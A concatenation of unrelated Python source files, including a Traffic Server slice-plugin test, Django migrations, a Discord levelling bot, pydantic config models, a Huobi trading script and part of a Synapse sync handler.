# print(astropy.units.Quantity(100.*refr.press,unit=astropy.units.Pa))
# print(astropy.units.Quantity(refr.wlen,unit= astropy.units.um))
# todo: render also proper motions (all 3 coords)
# This is a blank form of Alt/aZ because the two angles are yet unknown
# altaz = astropy.coordinates.builtin_frames.AltAz
altaz = astropy.coordinates.AltAz(
location = earthloc,
obstime=now,
pressure= astropy.units.Quantity(100.*refr.press,unit=astropy.units.Pa),
temperature = astropy.units.Quantity(refr.temp, unit = astropy.units.deg_C),
relative_humidity = refr.rhum,
obswl = astropy.units.Quantity(refr.wlen,unit= astropy.units.um))
try:
horiz = self.targ.transform_to(altaz)
except ValueError as ex:
# This is sometimes triggered by being offline or the
# IERS data server being unreachable.
# Try again with a sort of offline attempt of the IERS tables
from astropy.utils.iers import conf
conf.auto_download = False
horiz = self.targ.transform_to(altaz)
return horiz
|
py | 7dfadbfe29466ae52705107458a1e98a5773ea7f | '''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Test.Summary = '''
Basic slice plugin test
'''
# Test description:
# Preload the cache with the entire asset to be range requested.
# Reload remap rule with slice plugin
# Request content through the slice plugin
Test.SkipUnless(
Condition.PluginExists('slice.so'),
)
Test.ContinueOnFail = False
# configure origin server
server = Test.MakeOriginServer("server")
# Define ATS and configure
ts = Test.MakeATSProcess("ts", command="traffic_server")
# default root
request_header_chk = {"headers":
"GET / HTTP/1.1\r\n" +
"Host: ats\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
response_header_chk = {"headers":
"HTTP/1.1 200 OK\r\n" +
"Connection: close\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
server.addResponse("sessionlog.json", request_header_chk, response_header_chk)
block_bytes = 7
body = "lets go surfin now"
request_header = {"headers":
"GET /path HTTP/1.1\r\n" +
"Host: origin\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": "",
}
response_header = {"headers":
"HTTP/1.1 200 OK\r\n" +
"Connection: close\r\n" +
'Etag: "path"\r\n' +
"Cache-Control: max-age=500\r\n" +
"\r\n",
"timestamp": "1469733493.993",
"body": body,
}
server.addResponse("sessionlog.json", request_header, response_header)
curl_and_args = 'curl -s -D /dev/stdout -o /dev/stderr -x http://127.0.0.1:{}'.format(ts.Variables.port)
# set up whole asset fetch into cache
ts.Disk.remap_config.AddLines([
'map http://preload/ http://127.0.0.1:{}'.format(server.Variables.Port),
'map http://slice/ http://127.0.0.1:{}'.format(server.Variables.Port) +
' @plugin=slice.so @pparam=--blockbytes-test={}'.format(block_bytes)
])
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 0,
'proxy.config.diags.debug.tags': 'slice',
})
# 0 Test - Prefetch entire asset into cache
tr = Test.AddTestRun("Fetch first slice range")
ps = tr.Processes.Default
ps.StartBefore(server, ready=When.PortOpen(server.Variables.Port))
ps.StartBefore(Test.Processes.ts)
ps.Command = curl_and_args + ' http://preload/path'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_200.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("200 OK", "expected 200 OK response")
tr.StillRunningAfter = ts
# 1 Test - First complete slice
tr = Test.AddTestRun("Fetch first slice range")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 0-6'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_first.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 0-6/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 2 Test - Last slice auto
tr = Test.AddTestRun("Last slice -- 14-")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 3 Test - Last slice exact
tr = Test.AddTestRun("Last slice 14-17")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-17'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 4 Test - Last slice truncated
tr = Test.AddTestRun("Last truncated slice 14-20")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 14-20'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_last.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 14-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 5 Test - Whole asset via slices
tr = Test.AddTestRun("Whole asset via slices")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_200.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("200 OK", "expected 200 OK response")
tr.StillRunningAfter = ts
# 6 Test - Whole asset via range
tr = Test.AddTestRun("Whole asset via range")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 0-'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_206.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 0-17/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 7 Test - Non aligned slice request
tr = Test.AddTestRun("Non aligned slice request")
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r 5-16'
ps.ReturnCode = 0
ps.Streams.stderr = "gold/slice_mid.stderr.gold"
ps.Streams.stdout.Content = Testers.ContainsExpression("206 Partial Content", "expected 206 response")
ps.Streams.stdout.Content += Testers.ContainsExpression("Content-Range: bytes 5-16/18", "mismatch byte content response")
tr.StillRunningAfter = ts
# 8 Test - special case, begin inside last slice block but outside asset len
tr = Test.AddTestRun("Invalid end range request, 416")
beg = len(body) + 1
end = beg + block_bytes
ps = tr.Processes.Default
ps.Command = curl_and_args + ' http://slice/path' + ' -r {}-{}'.format(beg, end)
ps.Streams.stdout.Content = Testers.ContainsExpression("416 Requested Range Not Satisfiable", "expected 416 response")
tr.StillRunningAfter = ts
|
py | 7dfadbfe5ad7043ffcb9f37317e9e8b6d6620eb0 | def process_default(api_dict):
# 默认值
from app import app
SPECIAL_PARAMS = app.config["SPECIAL_PARAMS"]
params_with_default = {k: v[0] for k, v in SPECIAL_PARAMS.items() if isinstance(v[0], str)}
# param_trans参数 如果设置了特殊参数 是在默认值的基础上进行拼接
if SPECIAL_PARAMS.get("param_trans", ""):
params_trans_default = SPECIAL_PARAMS.get("param_trans", "")[0]
if isinstance(params_trans_default, str):
params_trans_default_list = params_trans_default.split(",")
params_trans_list = api_dict.get("param_trans", "").split(",")
pt_list = params_trans_default_list + params_trans_list
# 对结果去重
from utils.get_unilist import get_unilist
api_dict["param_trans"] = ",".join(get_unilist(pt_list))
# transformer的参数存在默认值
# predict
transformer = api_dict.get("transformer", "")
if "predict" in transformer:
if "(" in transformer and ")" in transformer:
args = transformer.replace(")", "")
if "realdata_show" not in args:
args += "+realdata_show=1d)"
api_dict["transformer"] = args
params_with_default.update(api_dict)
return 200, "success", params_with_default |
py | 7dfade61c7eb90d61e8ccbdc0c7e103cff180001 | # proxy module
from pyface.tasks.task_window_layout import *
|
py | 7dfadf2a2f8cc91f4af495aea294a99b977ebb6a | # Generated by Django 3.2.12 on 2022-03-10 07:36
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import mycarehub.common.models.base_models
import mycarehub.utils.general_utils
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('clients', '0027_alter_servicerequest_request_type'),
('common', '0016_auto_20220215_1721'),
('staff', '0003_auto_20220215_1157'),
]
operations = [
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('active', models.BooleanField(default=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('created_by', models.UUIDField(blank=True, null=True)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('updated_by', models.UUIDField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('appointment_type', models.CharField(max_length=36)),
('status', models.CharField(max_length=36)),
('reason', models.TextField(blank=True, max_length=1024, null=True)),
('provider', models.CharField(blank=True, help_text='Name of individual conducting the appointment for when the staff is not in our system', max_length=36, null=True)),
('date', models.DateField()),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
('client', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='clients.client')),
('organisation', models.ForeignKey(default=mycarehub.utils.general_utils.default_organisation, on_delete=django.db.models.deletion.PROTECT, related_name='appointments_appointment_related', to='common.organisation')),
('staff', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='staff.staff')),
],
options={
'ordering': ('-updated', '-created'),
'abstract': False,
},
managers=[
('objects', mycarehub.common.models.base_models.AbstractBaseManager()),
],
),
]
|
py | 7dfae1a5a35dbc4160e5605ce5f60da9bc83a17c | import pytest
from django.urls import reverse
from manas_apps.users.models import User
pytestmark = pytest.mark.django_db
class TestUserAdmin:
def test_changelist(self, admin_client):
url = reverse("admin:users_user_changelist")
response = admin_client.get(url)
assert response.status_code == 200
def test_search(self, admin_client):
url = reverse("admin:users_user_changelist")
response = admin_client.get(url, data={"q": "test"})
assert response.status_code == 200
def test_add(self, admin_client):
url = reverse("admin:users_user_add")
response = admin_client.get(url)
assert response.status_code == 200
response = admin_client.post(
url,
data={
"username": "test",
"password1": "My_R@ndom-P@ssw0rd",
"password2": "My_R@ndom-P@ssw0rd",
},
)
assert response.status_code == 302
assert User.objects.filter(username="test").exists()
def test_view_user(self, admin_client):
user = User.objects.get(username="admin")
url = reverse("admin:users_user_change", kwargs={"object_id": user.pk})
response = admin_client.get(url)
assert response.status_code == 200
|
py | 7dfae1c98c1b90e8753745471d83170850175ca2 | from functools import reduce
from pathlib import Path
from typing import TYPE_CHECKING, Iterable, List, Optional, Type, TypeVar, Union
from pydantic import BaseModel, Field, validator
from pydantic.fields import ModelField
from pydantic_yaml import YamlModel
from .util import dict_merge
from .yaml import yaml
if TYPE_CHECKING:
Model = TypeVar("Model", bound="BaseModel")
def default_if_none(cls, v, field: ModelField):
if v is None:
if getattr(field, "default", None) is not None:
return field.default
if field.default_factory is not None:
return field.default_factory()
else:
return v
class BaseYamlConfigModel(YamlModel):
config_path: Path = Field(Path("."), exclude=True)
def __or__(self, other: "Model") -> "Model":
return type(self).parse_obj(
dict_merge(
self.dict(exclude={"config_path": {}}, exclude_defaults=True),
other.dict(exclude={"config_path": {}}, exclude_defaults=True),
)
)
@classmethod
def parse_file(
cls: Type["Model"],
path: Union[str, Path],
**kwargs,
) -> "Model":
obj = super(BaseYamlConfigModel, cls).parse_file(path, **kwargs)
obj.config_path = Path(path)
return obj
def yaml(self, with_descriptions=False, **dict_kwargs):
if with_descriptions:
yaml_dict = yaml.load(self.yaml(**dict_kwargs))
_construct_yaml_dict_with_comments(type(self), yaml_dict)
else:
yaml_dict = self.dict(**dict_kwargs)
return yaml.dump_str(yaml_dict)
def write_yaml(self, path: Path = None, create_parents: bool = True, **yaml_kwargs):
if path is None:
path = self.config_path
if create_parents:
path.parent.mkdir(exist_ok=True, parents=True)
path.write_text(self.yaml(**yaml_kwargs))
@classmethod
def none(cls: Type["Model"]) -> "Model":
return cls.construct(**{field: None for field in cls.__fields__})
class BaseYamlConfigModelWithBase(BaseYamlConfigModel):
base_config: Optional[List[Path]] = Field(default_factory=list)
@validator("base_config", pre=True)
def ensure_base_config_type(cls, v):
if v is None:
return []
if isinstance(v, str):
return [Path(v)]
if isinstance(v, Iterable):
return list(v)
if isinstance(v, Path):
return [v]
raise ValueError(f"invalid value for base_config: '{v}'")
def merge_bases(self):
base_configs = [
config_path if config_path.is_absolute() else self.config_path.parent / config_path
for config_path in self.base_config
]
base_configs = [
type(self).parse_file(config_path).merge_bases() for config_path in base_configs
]
if not base_configs:
return self
bases_merged = reduce(lambda a, b: a | b, base_configs)
return bases_merged | self
def _construct_yaml_dict_with_comments(cls, d, column=0):
for k, v in d.items():
field = cls.__fields__[k]
if issubclass(field.type_, BaseModel):
_construct_yaml_dict_with_comments(field.type_, v, column + 4)
if field.field_info.description:
d.yaml_set_comment_before_key(k, field.field_info.description, column=column)
d.yaml_add_newline_before_key(k)
|
py | 7dfae3b7b86eabe16314d359adf0ec8659b8437a | # coding: utf-8
"""
SignRequest API
API for SignRequest.com
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import signrequest_client
from signrequest_client.models.inline_response200 import InlineResponse200 # noqa: E501
from signrequest_client.rest import ApiException
class TestInlineResponse200(unittest.TestCase):
"""InlineResponse200 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineResponse200(self):
"""Test InlineResponse200"""
# FIXME: construct object with mandatory attributes with example values
# model = signrequest_client.models.inline_response200.InlineResponse200() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 7dfae3f5293cdea298b74aa61d14fffc346da02d | # Generated by Django 2.0.6 on 2018-07-10 12:12
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
bases=('auth.user', models.Model),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
|
py | 7dfae437160c7c9c9da826179e1f8c53cbd5619b | # Imports
import asyncio
import discord
from discord.ext import commands
from pymongo import MongoClient
from ruamel.yaml import YAML
import vacefron
import os
import re
from dotenv import load_dotenv
# Loads the .env file and gets the required information
load_dotenv()
MONGODB_URI = os.environ['MONGODB_URI']
COLLECTION = os.getenv("COLLECTION")
DB_NAME = os.getenv("DATABASE_NAME")
# Please enter your mongodb details in the .env file.
cluster = MongoClient(MONGODB_URI)
levelling = cluster[COLLECTION][DB_NAME]
# Reads the config file, no need for changing.
yaml = YAML()
with open("Configs/config.yml", "r", encoding="utf-8") as file:
config = yaml.load(file)
if os.path.exists("Configs/holidayconfig.yml") is True:
with open("Configs/holidayconfig.yml", "r", encoding="utf-8") as file3:
holidayconfig = yaml.load(file3)
# Vac-API, no need for altering!
vac_api = vacefron.Client()
class levelsys(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_message(self, ctx):
if not ctx.author.bot:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
serverstats = levelling.find_one({"server": ctx.guild.id})
bot_stats = levelling.find_one({"bot_name": self.client.user.name})
talk_channels = serverstats['ignored_channels']
if len(talk_channels) > 1 and ctx.channel.id not in talk_channels or config['Prefix'] in ctx.content:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"]
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
elif len(talk_channels) < 1 or ctx.channel.id in talk_channels:
if bot_stats["event_state"] is True:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats['xp'] + serverstats['xp_per_message'] * holidayconfig['bonus_xp']
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
user = ctx.author
role = discord.utils.get(ctx.guild.roles, name=serverstats["double_xp_role"])
if role in user.roles:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"] + serverstats['xp_per_message'] * 2
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
else:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"] + serverstats['xp_per_message']
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
xp = stats['xp']
lvl = 0
while True:
if xp < ((config['xp_per_level'] / 2 * (lvl ** 2)) + (config['xp_per_level'] / 2 * lvl)):
break
lvl += 1
xp -= ((config['xp_per_level'] / 2 * ((lvl - 1) ** 2)) + (config['xp_per_level'] / 2 * (lvl - 1)))
if stats["xp"] < 0:
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": 0}})
if stats["rank"] != lvl:
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"rank": lvl + 1}})
embed2 = discord.Embed(title=f":tada: **LEVEL UP!**",
description=f"{ctx.author.mention} just reached Level: **{lvl}**",
colour=config['embed_colour'])
xp = stats["xp"]
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id},
{"$set": {"rank": lvl, "xp": xp + serverstats['xp_per_message'] * 2}})
print(f"User: {ctx.author} | Leveled UP To: {lvl}")
embed2.add_field(name="Next Level:",
value=f"`{int(config['xp_per_level'] * 2 * ((1 / 2) * lvl))}xp`")
embed2.set_thumbnail(url=ctx.author.avatar_url)
member = ctx.author
channel = discord.utils.get(member.guild.channels, name=serverstats["level_channel"])
if channel is None:
return
if config['level_up_ping'] is True:
await channel.send(f"{ctx.author.mention},")
msg = await channel.send(embed=embed2)
level_roles = serverstats["role"]
level_roles_num = serverstats["level"]
for i in range(len(level_roles)):
if lvl == int(level_roles_num[i]):
await ctx.author.add_roles(
discord.utils.get(ctx.author.guild.roles, name=level_roles[i]))
embed2.add_field(name="Role Unlocked", value=f"`{level_roles[i]}`")
print(f"User: {ctx.author} | Unlocked Role: {level_roles[i]}")
embed2.set_thumbnail(url=ctx.author.avatar_url)
await msg.edit(embed=embed2)
# remove the previous role
if i > 0:
await ctx.author.remove_roles(
discord.utils.get(ctx.author.guild.roles, name=level_roles[i - 1]))
else:
continue
@commands.Cog.listener()
async def on_guild_join(self, guild):
await asyncio.sleep(1.5)
serverstats = levelling.find_one({"server": guild.id})
if serverstats is None:
newserver = {"server": guild.id, "xp_per_message": 10, "double_xp_role": "None",
"level_channel": "private",
"Antispam": False, "mutedRole": "None", "mutedTime": 300, "warningMessages": 5,
"muteMessages": 6,
"ignoredRole": "None", "event": "Ended", "ignored_channels": []}
levelling.insert_one(newserver)
if config['private_message'] is True:
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
prefix = config['Prefix']
embed = discord.Embed(title=f"👋 // Greetings, {guild.name}",
description=f"Thanks for inviting me, my prefix here is: `{prefix}`")
if os.path.exists("Addons/Extras+.py") is True:
embed.add_field(name="🚀 | What's Next?",
value=f"`{prefix}help` displays every command you need to know for {self.client.user.mention}",
inline=False)
embed.add_field(name="🧭 | Important Links:",
value=f"[Support Server](https://www.discord.gg/E56eZdNjK4) - Get support for {self.client.user.mention}")
if guild.system_channel is None:
await guild.create_text_channel('private', overwrites=overwrites)
channel = discord.utils.get(guild.channels, name="private")
if channel is None:
return
await channel.send(embed=embed)
else:
await guild.system_channel.send(embed=embed)
for member in guild.members:
if not member.bot:
serverstats = levelling.find_one({"server": guild.id})
economy_stats = levelling.find_one(
{"guildid": guild.id, "id": member.id, "money": {"$exists": True}})
if economy_stats:
user = f"<@{member.id}>"
levelling.update_one({"guildid": guild.id, "id": member.id}, {
"$set": {"tag": user, "xp": serverstats['xp_per_message'], "rank": 1, "background": " ",
"circle": False, "xp_colour": "#ffffff", "name": f"{member}", "warnings": 0}})
continue
else:
newuser = {"guildid": member.guild.id, "id": member.id, "tag": f"<@{member.id}>",
"xp": serverstats['xp_per_message'],
"rank": 1, "background": " ", "circle": False, "xp_colour": "#ffffff", "warnings": 0,
"name": str(member)}
levelling.insert_one(newuser)
print(f"User: {member.id} has been added to the database!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
# Removes the server from the database
levelling.delete_one({"server": guild.id})
# Deletes all users when they bot is removed from the server
for member in guild.members:
if not member.bot:
levelling.delete_one({"guildid": guild.id, "id": member.id})
print(f"User: {member.id} has been removed from the database!")
@commands.Cog.listener()
async def on_member_join(self, member):
if not member.bot:
await asyncio.sleep(1.5)
serverstats = levelling.find_one({"server": member.guild.id})
economy_stats = levelling.find_one(
{"guildid": member.guild.id, "id": member.id, "money": {"$exists": True}})
if economy_stats:
user = f"<@{member.id}>"
levelling.update_one({"guildid": member.guild.id, "id": member.id}, {
"$set": {"tag": user, "xp": serverstats['xp_per_message'], "rank": 1, "background": " ",
"circle": False, "xp_colour": "#ffffff", "name": f"{member}", "warnings": 0}})
else:
getGuild = levelling.find_one({"server": member.guild.id})
newuser = {"guildid": member.guild.id, "id": member.id, "tag": f"<@{member.id}>",
"xp": getGuild["xp_per_message"],
"rank": 1, "background": " ", "circle": False, "xp_colour": "#ffffff", "warnings": 0,
"name": str(member)}
levelling.insert_one(newuser)
print(f"User: {member.id} has been added to the database!")
@commands.Cog.listener()
async def on_member_remove(self, member):
if not member.bot:
levelling.delete_one({"guildid": member.guild.id, "id": member.id})
print(f"User: {member.id} has been removed from the database!")
def setup(client):
client.add_cog(levelsys(client))
# End Of Level System
|
py | 7dfae575d6601b2e7c241053b946c5869fe4e2c4 | # Generated by Django 2.1.7 on 2019-04-03 07:49
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounting_tech', '0015_auto_20190403_1035'),
]
operations = [
migrations.CreateModel(
name='Request_to_repair',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('complainant', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounting_tech.Employees', verbose_name='Заявитель')),
],
),
migrations.AddField(
model_name='equipment',
name='inventory_number',
field=models.CharField(blank=True, default='0-53999', max_length=100, verbose_name='ИНВ №'),
),
]
|
py | 7dfae632076cf0fd38f824a90a99a86113e392e1 | # This function is not intended to be invoked directly. Instead it will be triggered by an orchestrator function.
import os
import requests
import json
from urllib import parse
import azure.functions as func
resource = 'https://manage.office.com'
def main(name: str) -> str:
data = json.loads(name)
clientSecret = os.getenv(data['secretKey'])
clientId = data['clientId']
tenantId = data['tenantId']
tokenHost = 'https://login.microsoftonline.com/' + tenantId + '/oauth2/token'
params = {'resource' : resource, 'client_id' : clientId, 'client_secret' : clientSecret, 'grant_type' : 'client_credentials'}
body = parse.urlencode(params).encode("utf-8")
response = requests.get(tokenHost, data=body)
jsonResponse = json.loads(response.text)
aadToken = jsonResponse["access_token"]
tenantReq = {'tenantId' : tenantId,'token' : aadToken}
return(tenantReq)
|
py | 7dfae7019df99653c7268d589f060c6d39c1472c | from huobi.client.trade import TradeClient
from huobi.constant import *
from huobi.utils import *
from keys.py import *
symbol_test = "ftiusdt"
trade_client = TradeClient(g_api_key, g_secret_key)
order_id = trade_client.create_order(symbol=symbol_test, account_id=g_account_id, order_type=OrderType.SELL_LIMIT, source=OrderSource.API, amount=1.0, price=50000)
LogInfo.output("created order id : {id}".format(id=order_id))
orderObj = trade_client.get_order(order_id=order_id)
LogInfo.output("======= get order by order id : {order_id} =======".format(order_id=order_id))
orderObj.print_object()
#canceled_order_id = trade_client.cancel_order(symbol_test, order_id)
#if canceled_order_id == order_id:
# LogInfo.output("cancel order {id} done".format(id=canceled_order_id))
#else:
# LogInfo.output("cancel order {id} fail".format(id=canceled_order_id))
|
py | 7dfae78db01e74b6b1813c13365a7a2759014098 | # -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from twisted.internet import defer
from synapse.api.constants import EventTypes, Membership
from synapse.api.errors import AuthError, Codes, SynapseError
from synapse.events.utils import serialize_event
from synapse.events.validator import EventValidator
from synapse.handlers.presence import format_user_presence_state
from synapse.streams.config import PaginationConfig
from synapse.types import StreamToken, UserID
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import concurrently_execute
from synapse.util.caches.snapshot_cache import SnapshotCache
from synapse.util.logcontext import make_deferred_yieldable, run_in_background
from synapse.visibility import filter_events_for_client
from ._base import BaseHandler
logger = logging.getLogger(__name__)
class InitialSyncHandler(BaseHandler):
def __init__(self, hs):
super(InitialSyncHandler, self).__init__(hs)
self.hs = hs
self.state = hs.get_state_handler()
self.clock = hs.get_clock()
self.validator = EventValidator()
self.snapshot_cache = SnapshotCache()
def snapshot_all_rooms(self, user_id=None, pagin_config=None,
as_client_event=True, include_archived=False):
"""Retrieve a snapshot of all rooms the user is invited or has joined.
This snapshot may include messages for all rooms where the user is
joined, depending on the pagination config.
Args:
user_id (str): The ID of the user making the request.
pagin_config (synapse.api.streams.PaginationConfig): The pagination
config used to determine how many messages *PER ROOM* to return.
as_client_event (bool): True to get events in client-server format.
include_archived (bool): True to get rooms that the user has left
Returns:
A list of dicts with "room_id" and "membership" keys for all rooms
the user is currently invited or joined in on. Rooms where the user
is joined on, may return a "messages" key with messages, depending
on the specified PaginationConfig.
"""
key = (
user_id,
pagin_config.from_token,
pagin_config.to_token,
pagin_config.direction,
pagin_config.limit,
as_client_event,
include_archived,
)
now_ms = self.clock.time_msec()
result = self.snapshot_cache.get(now_ms, key)
if result is not None:
return result
return self.snapshot_cache.set(now_ms, key, self._snapshot_all_rooms(
user_id, pagin_config, as_client_event, include_archived
))
@defer.inlineCallbacks
def _snapshot_all_rooms(self, user_id=None, pagin_config=None,
as_client_event=True, include_archived=False):
memberships = [Membership.INVITE, Membership.JOIN]
if include_archived:
memberships.append(Membership.LEAVE)
room_list = yield self.store.get_rooms_for_user_where_membership_is(
user_id=user_id, membership_list=memberships
)
user = UserID.from_string(user_id)
rooms_ret = []
now_token = yield self.hs.get_event_sources().get_current_token()
presence_stream = self.hs.get_event_sources().sources["presence"]
pagination_config = PaginationConfig(from_token=now_token)
presence, _ = yield presence_stream.get_pagination_rows(
user, pagination_config.get_source_config("presence"), None
)
receipt_stream = self.hs.get_event_sources().sources["receipt"]
receipt, _ = yield receipt_stream.get_pagination_rows(
user, pagination_config.get_source_config("receipt"), None
)
tags_by_room = yield self.store.get_tags_for_user(user_id)
account_data, account_data_by_room = (
yield self.store.get_account_data_for_user(user_id)
)
public_room_ids = yield self.store.get_public_room_ids()
limit = pagin_config.limit
if limit is None:
limit = 10
@defer.inlineCallbacks
def handle_room(event):
d = {
"room_id": event.room_id,
"membership": event.membership,
"visibility": (
"public" if event.room_id in public_room_ids
else "private"
),
}
if event.membership == Membership.INVITE:
time_now = self.clock.time_msec()
d["inviter"] = event.sender
invite_event = yield self.store.get_event(event.event_id)
d["invite"] = serialize_event(invite_event, time_now, as_client_event)
rooms_ret.append(d)
if event.membership not in (Membership.JOIN, Membership.LEAVE):
return
try:
if event.membership == Membership.JOIN:
room_end_token = now_token.room_key
deferred_room_state = run_in_background(
self.state_handler.get_current_state,
event.room_id,
)
elif event.membership == Membership.LEAVE:
room_end_token = "s%d" % (event.stream_ordering,)
deferred_room_state = run_in_background(
self.store.get_state_for_events,
[event.event_id],
)
deferred_room_state.addCallback(
lambda states: states[event.event_id]
)
(messages, token), current_state = yield make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.get_recent_events_for_room,
event.room_id,
limit=limit,
end_token=room_end_token,
),
deferred_room_state,
]
)
).addErrback(unwrapFirstError)
messages = yield filter_events_for_client(
self.store, user_id, messages
)
start_token = now_token.copy_and_replace("room_key", token)
end_token = now_token.copy_and_replace("room_key", room_end_token)
time_now = self.clock.time_msec()
d["messages"] = {
"chunk": [
serialize_event(m, time_now, as_client_event)
for m in messages
],
"start": start_token.to_string(),
"end": end_token.to_string(),
}
d["state"] = [
serialize_event(c, time_now, as_client_event)
for c in current_state.values()
]
account_data_events = []
tags = tags_by_room.get(event.room_id)
if tags:
account_data_events.append({
"type": "m.tag",
"content": {"tags": tags},
})
account_data = account_data_by_room.get(event.room_id, {})
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
d["account_data"] = account_data_events
except Exception:
logger.exception("Failed to get snapshot")
yield concurrently_execute(handle_room, room_list, 10)
account_data_events = []
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
now = self.clock.time_msec()
ret = {
"rooms": rooms_ret,
"presence": [
{
